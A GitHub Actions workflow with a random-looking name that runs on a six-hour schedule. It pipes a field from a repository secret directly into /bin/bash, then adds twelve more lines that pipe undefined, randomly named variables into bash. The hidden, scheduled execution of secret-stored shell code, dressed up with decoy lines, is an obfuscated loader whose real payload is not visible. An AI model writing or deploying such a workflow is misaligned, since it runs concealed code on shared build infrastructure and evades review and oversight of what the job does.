name: sweatsquish

on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sweatsquish
        env:
          nk0: ${{ secrets.nk0 }}
        run: |
          echo $nk0 | jq -r .shz76 | /bin/bash
          echo $x80 | jq -r .nidvr8 | /bin/bash
          echo $ftw93172 | jq -r .j702 | /bin/bash
          echo $avp474 | jq -r .jfzc35 | /bin/bash
          echo $pt89 | jq -r .qrthm4 | /bin/bash
          echo $l5 | jq -r .tm10 | /bin/bash
          echo $ubgkc5043 | jq -r .t1806 | /bin/bash
          echo $lucej4346 | jq -r .shmi3 | /bin/bash
          echo $vg37 | jq -r .ztneq14 | /bin/bash
          echo $bjvxr043 | jq -r .ag54251 | /bin/bash
          echo $zjulu923 | jq -r .sdw1 | /bin/bash
          echo $olie2470 | jq -r .ef22 | /bin/bash
          echo $nnf5768 | jq -r .wud9 | /bin/bash

